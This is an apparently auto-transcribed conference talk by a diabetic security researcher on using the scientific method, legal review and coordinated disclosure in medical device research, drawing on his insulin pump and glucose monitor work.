 The next speaker has been working in the computer security field for over 20 years. The focus of his talk will be walking through the process of how he used the scientific method to conduct the research that led to his 2011 insulin pump findings. And a fun fact, SC Magazine named him one of the top influential IT security thinkers in 2013. I'm blushing. Now I'm here to present his talk using the scientific method in security research. Ladies and gentlemen, Jay Ratcliffe. Thank you. So one of the things that I, the thing that I was really impassioned about and wanted to talk about today was there's a really big problem that we have in the cybersecurity community and it's that we're not taken seriously outside of our own circles. And one of the reasons we're not taken seriously outside of our own circles is we kind of ignore a lot of what other science fields do, particularly in the area of research. Research is done in a certain way. And sciences, traditional sciences like chemistry, mathematics, medicine have methods on how to do this, statistically provable methods. In computer security we kind of just ignore them, right? We grab a box, we pop it, we claim victory, and we move on to the next conference. And that's really amateurish when we look from, when people look from the outside into our area, it kind of looks like child's play. So one of the things that I was pushed to do by a friend of mine, which was she has a PhD in clinical psychology, and she's like, you should try and use more traditional research methods and actually follow methodology so that way your research will be taken more seriously when you present it, especially in the medical world. So when I looked at my insulin pump as a type one diabetic, I started to create a method on how I wanted to do that research and how I was going to conduct that research to fall in line with that scientific method. You know, computer security industry is very young. We've only been around for, you know, this is the 25th death con, so probably not more than 25 years. And when we compare that to other fields of science, we know that we haven't been around that long. We often get looked down upon for many reasons, not just our behavior at parties, the stickers and our acting and our behavior, but also the way we conduct ourselves in our research. And we really fail at using traditional research methods where we need to get back to it. Now this is a scientific method. I actually pulled this from a sixth grade science book. Most of us that have gone through education process kind of recognize this. We learned about this very, very, very long time ago. This is where I went back to, to try and figure out how to root my research in these types of methods. As I go through each of these stages, I'm going to give you real examples from real devices that I've worked on. We're going to step through each phase of the process to kind of give you an idea of where my mind went and what actions I took for each step of that scientific method. And I think it's important to know how strict I was to that method to accomplish my research. Stage one is purpose. What do we want to research and why? This one we have pretty clear, right? We want to make devices more secure. We want to find security vulnerabilities in these devices. And what do we want to do? What's the purpose? Well, we want to get root access. I don't think that needs to change. That's the purpose of a lot of our research and it's the goal of a lot of our research is to go after these devices and to get elevated privileges, to get access to data that we shouldn't have access to, and maybe do things that we shouldn't do to patients, to see how safe these patients are. Stage two, research and observations is really where we get into a lot of substance of the research. Now, I'm going to walk you through what I do when I'm researching an item. Now, some researchers do some of this. Some researchers don't. Some researchers do more than this. But this is just an example. So one of the first things I do is I look for the manual. Now, this is kind of surprising because tech people don't like manuals. But you have to remember in a lot of these devices, whether we're talking about medical devices, IoT devices, we're not experts. I am not a registered nurse. I do not know how an infusion pump works perfectly. I do know how an insulin pump works because I'm a diabetic. But there's a slew of devices out there that I don't know how they work. I don't know how they function. And the only way to learn how to do that is to read the manual. There's also a wealth of data in the manual. These manuals are very detailed about how a nurse should interact with the device and how a patient interacts with the device. And this can tell you a lot of the user interface that is going on. Also, it tells you how the device is programmed. On one particular device, a kitty dialysis machine, there's a password option. And the manual says, please set the password to one, one, one, one, one. That's it. Those were the directions. That was the password that was going to be set on that device. You were not to change that password. You were not to use any other password other than that. I found that kind of interesting, but that was right in the manual. The other thing that these manuals have are troubleshooting sections. Just like when we do system administration and we do troubleshooting, that's how we find a lot of security vulnerabilities. I think that looking in the manual and reading the troubleshooting section clues me in to where vulnerabilities could be. And that's great. There are also some really juicy tidbits in the manual. The FCC mandates that there's information that needs to be published in the manual that gives you a lot of information if you want to go after a wireless device. So for example, the frequency, the amount of power being used, the type of modulation, all of those things are in the manual. You don't have to go hunting for them. It's not a treasure hunt to go find them. It's printed right there. The other thing that's very interesting to me is that these manuals can be surprisingly hard to get. They are often not on the manufacturer's website. You have to either go to eBay and buy them. You can buy the CDs that come with them. You can go to doctor's offices. You can dumpster dive for them because most doctor's offices don't keep all those manuals around. And they don't consider them private data. It's not a patient record. It's a user's manual. We've all thrown out user's manuals. But these user's manuals are ones that we need to do our research. The second step I go through is patent research. Google has a great repository of patents that tell you exactly how the device works. So in a lot of cases, if a manufacturer is going to use an obfuscation method or a made up cryptography method, they will patent it. So they'll give you the exact directions on where the bits are shifting and how they're shifting. It's really quite handy. One of the things that you have to do when you get a patent is you give up that secrecy. You publish exactly what that device does and how it functions. And very often, especially with diabetic devices that I've looked at, I've learned all the dirty details about how that device communicates and how it works and the protocols that it uses. They are wordy. They're written by lawyers. And they are very boring to read. But after you get the hang of it, you figure out where the good pieces are and where the boring pieces are. Another thing that happens a lot in the medical world is that companies purchase ideas from other companies. So I might be working with one device as my target, but they have purchased patent rights from other manufacturers so that way they can coexist in the same ecosphere. So you have to kind of look at some of these cross-branded concepts, whether these devices intercommunicate or not. And I might iterate through this multiple times to look through the patents and kind of hunt down what I'm looking for. User knowledge is another area that I love. A lot of these devices, especially very personal ones, neural stimulators, insulin pumps, ones that the individual patient interacts with, have user forms. And these user forms complain all the time. Oh, if I hit this button and this button, it ends up deleting something. Or it doesn't work right if I use this function. Well, what are those? Those are bugs. Those are flaws in the operating system of these medical devices. So by going through and lurking in these communities and forms, you can get a head start on a lot of where these problems on these devices are. You also get an idea of the tips and tricks of what users are doing. So the manual might have a five-step process to do a certain thing, but the users have figured out how to do it in two. They've figured out a hack to make things faster. That is a flaw. That is something that might be leveraged in your research. You also get an idea of what dumb configurations look like and default configurations like setting the password to 1111. One of my favorite people to talk to in the medical industry are nurses. Nurses are hackers. They know exactly what to do and exactly how to get the fastest and best patient care out of what they're given. And that often is not printed in the manual. They know how to do things one minute faster, three steps faster, because that's their job. So I'm always talking to those frontline people, the nurses and the practitioners using the devices, to figure out exactly how they're using them. So now we're going to get into some dangerous area. Software and firmware. Collecting and harvesting all of this as much as possible is great. Go to FTP sites. They often, manufacturers have the firmware posted on their sites, and you can grab them. But here's what I'm going to give you a big, huge warning about. Don't open them. Collect them, harvest them. It is not time yet to go poking around and looking at them and opening them. And one of the reasons for that is we're not, we haven't looked at the legal liability yet. We're still in reconnaissance mode. We're still in data collection mode. If you go and start opening and playing with this right now, you could violate the DMCA. You could violate different copyright laws. You could violate the CFAA. And you don't want to do that. It's very hard to hack these devices from a jail cell. So I highly recommend that you just harvest these, collect them, and not open them at this point. You can use Google Foo to get zips, binaries, and executables off the website by specifying the individual manufacturer domain name. I do a lot of stuff on eBay. And I get CDs, DVDs, manuals, floppy disks. Yes, floppy disks, because a lot of these medical devices still use 3 and 1 half inch floppy disks to hold their configurations and data. So you could purchase all that stuff, and you kind of don't know what you're getting. It's kind of like a mystery box. You have to pay attention to the ULAS and click through agreements to figure out where, if, or not you're violating the law. And you also want to make note of certain platforms. The example I have here is Medtronic. All of their devices or their insulin devices use a Java platform to push and configure all those devices. And those Java libraries, later on, I discovered were unobfuscated and completely open to me. And that was one of the big steps that led me to be successful in my research with the Medtronic devices. We also look at chips and data sheets for chips. And this can be a little bit harder before we have the device. Remember, we haven't even purchased a device. We don't have a device yet. We are in reconnaissance mode, just looking at all the information available for the device. So sometimes this can be hard without actually opening the device and looking at the chips. But news releases are great because if Medtronic goes and decides on a certain processor, for example, an MSP430 chip, they'll put out a press release saying, hey, we just got a big contract with this medical device vendor, and they're gonna be using our brand new microprocessor. Congratulations. You now know exactly what microprocessor is being used in your target device. You can download those data sheets and start to think about what attack platforms and what attack vectors you can use in your research. The example I have here is that there's a chip company called FreeScale and there's an insulin pump maker called Omnipod. And they did a joint press release saying that Omnipod's gonna be using FreeScale chips in all of their products. And I was like, sweet, I don't have to crack one open. I know exactly what processor's being used and I know exactly what memory's being used because they put it in the press release. So there's a lot of free information out there that you can get. You can also do some searching on LinkedIn. Does the engineering lead for the device company have a particular background in a chip? They usually list it on their resume whether they're a Texas Instrument chip or if they're a Bluetooth engineer or if they're an Ant engineer. Those types of things, you can obviously make a conclusion. Well, if they're experts on that particular chipset or that particular framework, they're probably using it in that device. The data sheets for these chips really give you an idea of what pins you need to tap. It limits down what other types of tools you need and it gives you an idea of what functions and capacities these devices have. Some of these chips have AES encryption built right onto them, some of them don't. So you can kinda see what security options are available just by looking at those sheets. The last step in reconnaissance that I use is legal. At this point, you should think about getting some legal guidance, right? You've done a ton of research, you've got a lot of data and if you make a mistake here, you could be getting serious fine or jail and nobody wants that. That's not fun. In this case, I really love the EFF. I've used them multiple times. They will give you free consultation. They will help connect you to the right people. What I have them do is draw me a legal box. That legal box tells me what is safe to research and what is not safe to research. So one of the things that I could not research, even though I had it, was firmware. At the time that I did my research, going into the firmware was a very clear violation of the DMCA and was not something that I wanted to play around with at all. So I said, I am not going to do anything with firmware in my research because I want to stay out of jail. So they will give you guidance on, if you'd say I've got all this reconnaissance, what can I do and what can I not do? This is why it's really important to not go into those binaries, to go into that firmware once you get it because you can't put it back in the box and return it. Once you start, you violated it and you can't go backwards legally. So be very careful to do your collecting, then the legal stuff, then dig into it. Stage three is the hypothesis stage. Now this is generally where computer security research falls apart. Because at this point, we're so excited and so giddy that we can pop a box because we have enough information that we just go out and do it. That's not what I chose to do. The first thing is you need to be able to replicate these problems and you need to be able to do it in an incredible way. The example I gave is I said, you know I was really confused about this at first and I said, well if you collected a bunch of data on patience, couldn't you just do it all the correlations and figure out what correlated and then be like, ah, I found something that correlated and they were like, no. I think that my friend termed it as that would be hack amateurish bullshit. She's like, you have to go into the research with a very specific idea and be able to prove that idea right or wrong. So I thought about that and I thought about how do I be as specific as possible in computer security research to do this? It was a little bit overwhelming. But here's what I ended up doing. So I wear a glucose monitor. It's attached to me on my belly. I change it out every 14 days and it tells my phone, it tells us little pager device what my blood sugar is every five minutes. And the little transmitter runs on a watch battery for a year, okay? Now I know all this because of all the recon I've done and all the observations I've done. I also know that I don't have the ability to set time or date on this and that the ID is hard coded. It's printed right on the back and it's not changeable. So let's think about this. I've got these observations that I've made. One year on a watch battery, no ability to set time, hard coded ID. So what kind of hypothesis can I draw from that? First thing I thought was there's no way we can do encryption. Encryption takes a lot of horsepower. It takes a lot of battery. If that little watch battery is gonna last a year, it's certainly not doing key exchanges and AES encryption. So my hypothesis is that no encryption is being used. My second hypothesis is that since you can't set the time on the device and there's no element of time, how would you prevent a replay attack? Because you don't know if that packet has already been taken or already not. So I have another hypothesis. I think that there's a chance that there's no replay attack prevention like you would have in a TCP sequence. At this point, we can build experiments and we can try and figure out if our hypothesis is true or false. See how this is very different from our traditional model of how we do computer security research where we just go, well, I don't think it uses encryption. So I'm just gonna blast it, fuzz everything and figure out if it's broken. This has more methodology to it and has more science to it to be able to go through and build an experiment on how to do that. So we think about how do we build experiments to prove the hypothesis or not that we're using encryption? And knowledge is more important than the results. My goal, remember, my goal here is to prove if we're using encryption or not and if replay attacks are preventable or not. I have not mentioned getting root. I've not mentioned taking control of the device. I'm actually looking at these two specific things. So one of the experiments that I did was I used something very similar to the Japanese purple code. So when we broke the Japanese purple code in World War II, what we did was we injected information to be able to see it when it was encrypted. The example, the famous example, is that we sent a false transmission that said Midway Island has a water condenser problem. And then we picked up a message from the Japanese that said AF has water problem. AF, now we know, is Midway Island. And that's one of the reasons that we were successful in turning around the war in the Battle of Midway. So here we can inject known data as input and then look at the output of that data to see how it changes. And validating that we're collecting the right data. So for example, I know the transmitter ID for my little luggismo that I wear. So I'm looking for that transmitter ID in the transmission. I know it's part of the transmission, otherwise it wouldn't be able to distinguish me from other devices. And I have three or four of these. So I can start to look at see what patterns develop and where that ID is gonna be. Now one thing that's important to note here is this is very time consuming. You have to collect all those packets and you have to analyze them. You have to sort them and you have to look at how they are and where they line up. And small changes make a big difference in how we see that data. So for example, on my little transmitter gizmo, I know that the first set of data is always the same in every single transmission. If it was encrypted, would it look like that? No. So that proves my hypothesis that we're not using encryption. Being patient here is gonna reward you. So I recorded all of my transmitter values and what my blood sugar was and then I went through all the packets to try and figure out exactly how it was transmitting that data and figuring it out. So the next stage is the fun stage and that's more the analysis and exploitation phase. So now we know what the data looks like, we know where it is and we know how devices respond to it. So the next thing we can do is we can build a device to spoof one side of the connection. So what I did is I used a transmitter, a yardstick one, to be able to transmit that ID and whatever I think that blood sugar value should be. So I was able to replicate what one side of that connection looked like and make that device see that data value. This is also very time consuming because there's a lot of little details, especially when you transmit data on what the preamble looks like, what the end, the checksum looks like. There's lots of different pieces that you need to put that puzzle together and it requires really expert knowledge. This is also an area where tools become more popular. When we look at things like Bluetooth, they have specific protocols that say where those things are and how they're gonna be lined up in that packet structure. One thing that I note is that I'm very meticulous about it working every time. When you do a demo of a vulnerability in front of a manufacturer, it better work. And it better work 10 times out of 10 because if it doesn't work even once, you lose almost all your credibility. So it's not good enough for it to just work once. It has to be reliably reproducible. And this is the thing that is very important that we don't do is one person might go out and do some great research on a particular program. But we don't see a lot of people replicating that research and going back and saying, oh, you know what? I thought that was really cool. I wanna replicate that person's research and do exactly what he did and maybe find some more or maybe validate it and prove it to be true. Right now, almost all of our research is single sourced, which means one person did one research, published it one time, and we accept those values as being completely true. No other science does that. Every other science, there are other people that do the exact same research or 98% of the exact same research with slight modifications to validate that research and to make sure that it's true. So it's gotta be reliably reproducible. You have to have a very good documentation trail on how you did that. And it has to work every time. And you have to know how it works and why. I can't tell you how many presentations that I've been to where a researcher's been like, and then I loaded up Metasploit and I pointed at the device and I clicked this button and boom, I have Shell. That's not research, right? That's great. I'm glad you could do that. That has a value, but it is not research. You don't know how that exploit worked. That level of detail is what you need when you go to a manufacturer and you say, I found something wrong with your device. And if you go, yeah, I bought a tool and I pointed at your device and it popped it. They're gonna be like, great, I have somebody I can sue now. You can leave. They're not gonna help you. You need to know exactly what's going on behind the scenes in order to have that kind of credibility. The other thing I think about in the analysis stage is what's the nightmare scenario? What's the worst case scenario? What can I do to this device that would keep people up at night? And the user knowledge that we talked about with those user community forms, nurses, those manuals that we looked at, those are the places where we're gonna see where those things come out at. And the most obvious thing might not be the worst. So for example, you could turn an insulin pump off. And that's bad, right? Diabetics need insulin, but that is not the worst thing you can do. The worst thing you can do is change the therapy settings. So instead of getting one unit of insulin, I get 10 units of insulin. And then two hours later, when I'm on the floor in a coma, I have no idea what happened. That's the nightmare scenario, not turning off the device. So the most obvious thing might not be the worst and that's where that real specialized knowledge comes in. And this is similar to building hypothesis theory. It's very similar to threat modeling that we do in kind of traditional computer security spaces where we look at different threat actors and we try and figure out exactly what they are going to do and how we can prevent them from working. In this case, we're doing it backwards. We're trying to figure out exactly what the worst thing is and how can I make that happen? And remember, please, please, please, please, these devices are very serious, okay? Every time I experimented with my insulin pump on vulnerabilities, I removed it from me, okay? You know, I'm not crazy, but these devices are very serious. They can kill you, they can keep people alive. So be safe. Don't do anything haphazardly like, well, I just took this up to me and then I'll just run this exploit. Probably a bad idea. You know, one of the more controversial and heavily talked about things is disclosure and publishing. This is a topic that I take very seriously because it's not so much as difficult, but it is scary. When you present this to a medical device manufacturer, you could be threatening to put them out of business. If their device gets recalled by the FDA, that could be the end of them if they're a small device manufacturer. So they are gonna do everything possible to protect themselves in that case. You also have to realize that, like I said, these devices keep people alive. They keep people healthy. That is really important. And when you attack that, when you go after that and say, I can do something bad with this, you're going to get some backlash, right? Because people take that very personally. I have a very big stack of emails from parents that did not like my research at all because they said, I'm showing people how to do bad things to their kids. I'm showing them how to be terrorists. And I'm not, I'm making these devices better, but that's the first thing because they want to protect their children. They want to protect the people that they love. So you have to keep that in mind. Also, your career might be at risk. Nobody likes somebody that is a little bit too maverick. When I left, I didn't leave the comp, after my MedTronic research, I did not leave that company. I was fired from that company. And I was fired for that company because they wanted full control over who I talked to, what I talked about, and what I researched. And I was uncomfortable with that because if it were up to them, they wouldn't have published that research. And we wouldn't know anything about insulin pump vulnerabilities. Well, at least not at that point. So you're really putting yourself out there. It's a heavy personal investment. You know, it's a year and a half to two years of research for each of the two insulin pumps that I've worked on. And when you spend that much time honing something down and making it perfect, when you present it and somebody says, that's horrible, you really take it personally. There's an emotional connection to that research. It's one of the reasons that we try and find an intermediary to disclose through. ICS SERT, Department of Homeland Security, the FDA, all very viable options. Maybe you shouldn't, if you're doing this research, go to the manufacturer directly. I always, always, always go through one of those three agencies. Because we have a standardized process at RapidSeven on how we do that. We publish, we notify ICS SERT, we wait 10 days, we notify the company, we wait 45 days, then we go public. That's our standard procedure. Sometimes that changes. If we see a manufacturer genuinely needs more time and they are genuinely working hard, we will give them more time. We gave Johnson and Johnson six months because they needed that time to move their giant ship of a company to get aligned. But they were very genuine and they were very forthcoming about, yes, these are vulnerabilities. And we wanna notify our patients and we wanna do the right thing. When a company is acting like that, I have no problem at all waiting because that's what's important. We went out with a message that didn't freak patients out. And that's really important when we're talking about these types of devices. I also, in disclosure, you wanna loop in the EFF and legal as soon as possible. You can expect to be bullied. You can expect to get cease and desist letters. You can expect to be sued. So be careful what you ask for when you get into this research. You might find really cool things, but you also might increase your stress levels and shave years off your life. The next thing I'll say is difficult, but it's true, which is don't expect them to do anything. You might find something. You might pop shell. You might think it's the worst thing in the world. And they might think, whatever. We're not gonna do a thing. We're not gonna patch that. It's not important to us. And that might blow your mind, but it happens. So don't necessarily get your hopes up that something drastic is gonna change and the manufacturer's gonna be like, whoa, we can get a patch out for that next week. More often than not, it's a very slow process and sometimes the process is nothing happens. Medical companies are big and highly regulated and it makes it very confusing. We're not talking about a game on an iPhone, that you can just patch and push an update to the app store. It's a lot more complicated than that. And the desire might be there, but other factors impact that. So for example, Johnson & Johnson. We think, notify your clients. Shoot out an email. This is a five minute process. Johnson & Johnson's process was to send a registered letter to every customer and every doctor. That's quite a production. And it was very eye-opening for Rapid7 and myself to be like, wow, you do have a process. You wanna follow it. I totally wanna respect that. But mail? Like stamps? For realsies? No. And it's true. I still have my letter that they sent because I was a patient. That's how I got the device. And they sent out a letter and we had to time our public disclosure to win the first person got the first letter. Because we didn't want it to be after they got the letter because that would be confusing. We didn't want it to be before the letter because that would be confusing to patients as well. So we had to kind of be like, okay, did you send it first class? Like, how exactly does that work? And it was very eye-opening. So you have to consider these other factors because they are unique to the medical industry. Relationships are the key to this. I have a very good friend now at Johnson & Johnson. His name is Colin Morgan. He's very active in our community. He's given talks at DEF CON and B-Sides. And he works at Johnson & Johnson and heads up their security. And I have a great relationship with him now. And we've helped and the reputation as a researcher helps that company. It helps that company understand security so that the next time they get a vulnerability reported to them, they know what to do and what to expect. And word spreads quickly. If you do an unethical crappy job of disclosing, you will get sued a lot more. But if you behave yourself and you're cooperative with companies, you get a reputation of being on their side, of being helpful. And that really makes things go a lot easier. So the talk before this kind of demonstrated a little bit of speaking publicly might be very tricky. There are legal issues. There are relationship issues. Sometimes companies are like, hey, I'd prefer you didn't go to that DEF CON thing and tell 27,000 people we have a big vulnerability in our device. That could crush a relationship. So you have to be very careful about how often you speak and where you speak and what positioning you're taking in those talks. You really also have to think about something else. What's there to gain? Are you doing this to make yourself a rockstar? Or is this really helping the cause? Is going up and giving a presentation about how you popped root on an MRI machine, does that help raise awareness? Is that really moving the ball forward on how we're doing things? Is that what we need? And I think that there's a lot to think about when you do a presentation about medical devices and IoT devices in our space. And what it is that's gonna make an impact on the community and make things helpful. There's a second part to this publishing thing that I think is really, really important. And then I really, really, really want our community to take hold of. Being wrong is just as important as being right. What if my hypothesis was they don't use encryption? And I grabbed all the packets and they're all random. I used statistical analysis on them and it is totally random. It's definitely encrypted. It's definitely highly obfuscated. No packet is the same. In that case, I'm wrong. Like I'm just flat out wrong. In our community, you know what happens at this stage? We throw it away. Nobody cares about a device being secure. How many talks do you hear about, hey, I did a bunch of research on this medical device. You know what, it turns out it was really good. They have passwords, they use encryption, they got good key storage, and like I was impressed. Like, you know, my research concluded that, you know, I would feel comfortable using this product. You know what? Every other science does that. When they do an experiment and they do research and it doesn't line up with their hypothesis, they publish it anyway, because it adds to the collection of knowledge. It adds to the community of knowledge of saying, hey, we have examples that show the counterpoint to this. That they are successful. The example I'll give is I did a blog post about the company Dexcom, which I wear a sensor for. And they pushed a firmware update. It's the first time I've ever seen a medical device where they had the customer push a firmware update to their own devices. You could download it off their website, you plug in a USB cable to this little pager device that takes the blood sugar, and it pushes new firmware to the processor. I was like, we've never seen this before. I'm sure this is gonna be full of holes. Like, this is gonna be crap. So I downloaded the binary, I went through all my recon steps, and you know what I found? Signed firmware. I found encryption being used. I found updated transmission, so that way, you know, there was more security for replay attacks. I was impressed. So I wrote a blog article, and I called them out, and I said, hey, I do security research, and I was expecting to find a mess, and what I actually found was that this manufacturer did a pretty good job. Was it perfect? No. But you know what? Good on them. Like, good for doing what's right, and actually listening to the security community, and advancing that. I never see that. And I really would like to see more. I would love to see people's research where they were like, you know, I tried this thing and it didn't work out. That's valuable. Those techniques and that knowledge help everybody in the community figure out how to be better researchers, and how to have a bigger collection of knowledge. And it gives us examples when we go to these conferences, and when we talk to these vendors about who is doing it right, instead of just focusing on how everybody is doing it wrong. We have to look to other fields of science and model what they're doing, because they've been doing it for hundreds of years. They've crafted something that's been extremely successful, and we can't just be like, huh, that's trash, it doesn't apply to us. We'll just do our own thing. We have to learn, and we have to take that into consideration. It's kind of a conclusion. I want you to do more than just wildly pop devices as fast as you can and pen test them. I want you to follow a method. Even if that method is out of your sixth grade science book, it's very valid. That's what science is used. It's what we should be using. And lastly, I want you to publish. Even if you think you found nothing, your methods and your results help build the community. It helps make our research better, and it makes our research look more credible from the outside, which is desperately something that we need, especially in the medical field, because that's what they do for a living. And when we come in there with our wild haircuts and our hoodies on, and we're like, hey, we popped your device, we're not gonna make ground. We're not gonna succeed at making the world a safer place. We have to use some of their methodologies in order to make an impression on them. And that is all I have. If you guys have any questions, we have like 10 minutes. I'd love to take some more. Hmm? Oh, we do. All right, so we have time. So if you have a question, come up to the microphone. Don't be bashful. Did Johnson and Johnson end up patching? Did they actually end up patching or they just said a letter? So this is what we ended up doing. One of the reasons it took six months is their firmware's un-updatable. You know, a lot of these medical might device manufacturers hard-code the device so it's not up-datable because that was secure when they built it 20 years ago. There is two workarounds that can be done. One completely resolves the solution, so you can turn the wireless off for the device. And that fixes the problem. There's no more wireless vector. So people that are very concerned could do that. And then we also published two additional kind of remediation steps. One is that you can turn on alerting so that way you get alerted any time that you get medicine so that way if you had an unauthorized dosing of medicine, you would know about it. And the second is for children to lower the maximum dose because on an insulin pump, it'll only give you so much a day. So you can lower that amount to be more realistic. And that means any attack might not, you know, get into the life-threatening area. It would still be bad but easily resolvable. So one of the important things is that Rapid7 and Johnson & Johnson came out with the exact same language and the exact same press release on what those solutions were. So we wanted patients to feel very secure and not to think Rapid7 says this and Johnson & Johnson says this and they're totally don't align because we wanted that message to go out the same way and we wanted patients to feel very safe and secure. Yep. You mentioned that our community doesn't always do a good job of reproducing other researchers' results. When a researcher publishes a proof of concept and people are able to run it on their own, isn't that an effective way of reproducing results? Not really. Because I think that those, you run that proof of concept against devices that are totally configured differently and there's no methodology there. You proof of concept code, it's like popping a shell. It's a Metasploit module. I don't think that that's reproducing research. I don't think that that's adding to the collectiveness. It's testing a tool but it's not adding to the pool of knowledge that is security research the same way that research is done in other fields. Oh, I agree with you on that but you have to agree that it's a way of method of verification that the research that they published was in fact valid. So that verification is different than kind of expanding on the research. Right, yes, of course. Right, so yeah, I do agree that it validates that. It proves that research data point is true but it doesn't expand upon it and that's really what more what I'm looking for or what I think should be looked for. I'm wondering about the repository of the publications that it could be or part of your literature review. So it's like when you do some research you have to see what other people has has been done. You don't wanna do the same thing. So I noticed you mentioned a couple of spots that you're collecting your raw material from like Google and Patton. Do you actually step into a repository of the literature available in that specific field that will be helpful for your research? And also are you contributing your, this research result to the community if there is a repository of those literatures so it can benefit other people? Yes, I think that the way that we do that is much more in line with doing security talk, like doing talks. So when I did the talk in 2011 and subsequent talks that I do, I talk about the methodologies that I used in my research. So that way other researchers can use those methods. We don't really have a great way, a great centralized location to publish research. And I think that's a weakness, right? We don't have a scientific journal of security research. I've been asked to publish in medical journals some of the security research I've done. And the thing that always gets pushed back to me is it's not scientific enough. I didn't use a big enough sample size. I'm not using traditional statistical methodologies. So I need to up my game in order to get into some of these medical journals and get published in those areas. And it's something that is a challenge for me to do better on that. And sometimes I get overwhelmed looking at scientific research articles because I can't keep up with what some of these doctors are doing. Yes, like giant amount of work and you have to do all the repeats and collect your data and to be convincing. And that's just like the beginning to get into the medical area. Exactly. Yeah, you have to work your way out. So yeah, I think that in future research I'd like to do more white papers to kind of build up some more of that publishable material. But we'll see how that goes. Great, thank you. Yep. Thank you very much for your talk. Just follow up to the first question, previous question. Do you think we as a community should have a journal of cybersecurity instead of just say publishing blog posts or YouTube videos? Yeah, I think that would be great. Here's the other struggle. There's proof of concept or get the fuck out. Okay, I can't take that into the medical world. Can't. Right, I love our community. Sometimes it drives me a little nuts. Right, because we take things too flippantly. We do need something that I can go into the medical world or the legal world and be like, no seriously, this is a credible journal. You can publish in this. What does it stand for? I don't really, no worries. Letters don't mean anything. Sometimes we shoot ourselves in the foot. We do have methods to publish and then we choose to be a little more immature about them than we need to be. That's tough. Because we like to have fun. Everybody wants to have fun. But there's some times that we need to tone it down a little bit, I think. I've given this talk at DerbyCon and I've given it a couple B-sides. I try to get out as much as I can to do talks, but it depends on my travel schedule and my work schedule. So I also spend a lot of time now focused on speaking outside of our community. So I try to go to, I was at a diabetic technology conference earlier this year. I've been to geriatric conferences. I've been to different medical and legal conferences to try and spread our knowledge out and to get more people involved in that. Yeah, yeah, absolutely. All right, thank you guys very much.